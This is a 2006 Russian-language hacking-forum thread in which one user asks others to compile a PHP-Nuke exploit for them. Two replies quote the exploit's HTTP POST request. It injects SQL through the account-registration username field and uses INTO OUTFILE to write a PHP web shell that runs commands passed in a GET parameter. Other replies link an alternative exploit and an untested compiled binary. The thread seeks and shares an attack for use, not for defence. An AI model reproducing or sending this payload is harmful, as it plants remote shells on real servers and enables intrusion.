Форум АНТИЧАТ - Срочно! Сплоит!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Срочно! Сплоит! (https://forum.antichat.xyz/showthread.php?t=18967)

LoFFi

11.05.2006 19:55

Срочно! Сплоит!

Люди, под страхом расстрела позарез нужен сплоит!
Вот он

http://securityreason.com/achievement_exploitalert/7

Он на C++ и защищен или хз что, а я в C++ не шарю!
Нужен срочно, так что модеры извените за тему оффтоп! убейте ее потом!
задача: скомпилить под винду или линукс этот сплоит
и дать его мне =)

Репой озолочу!!!

max_pain89

11.05.2006 20:02

Цитата:

fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new
user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&userna me="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason
Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n&quo
t;
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");

Тут вроде все понятно написано. На Ачате можешь отправить с помощью InetCrack

SanyaX

11.05.2006 20:02

Под linux компилируй на винде он не попрёт.

SanyaX

11.05.2006 20:04

А проще не парьсе сделай в ручную всё. Вот тебе кусок кода подправьне много и отправь методом пост.

Код:

"Connection: Keep-Alive\n"

"Pragma: no-cache\n"

"Cache-control: no-cache\n"

"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"

"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"

"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"

"Accept-Language: en\n"

"Host: %s\n"

"Referer: http://%s%s?name=Your_Account&op=new user\n"

"User-Agent: SecurityReason - [SR]\n"

"Content-Type: application/x-www-form-urlencoded\n"

"Content-Length: %d\n\n"

"name=Your_Account&op=new

user&user_email=securitybreak@securityreason.com&"

"user_password=hackme&user_password2=hackme&username="

"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason

Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n&quo

t;

"Cookie: lang=english\r\n\r\n"

Go0o$E

11.05.2006 20:50

http://milw0rm.com/exploits/1270
Тоже самое вроде? Только на php.

LoFFi

11.05.2006 21:45

Короче я сам вспомнил C++ и исправил =) никто репу не заслужил... закрывайте тему

3er0	11.05.2006 21:46

лол) я не успел) может кто потестит мой?
__http://m3x000.narod.ru/lcc.rar
если не работает сильно не бить) и хотелось бы на твой вариант посмотреть LoFFi. Может научюсь чему-нибудь хорошему

Время: 17:06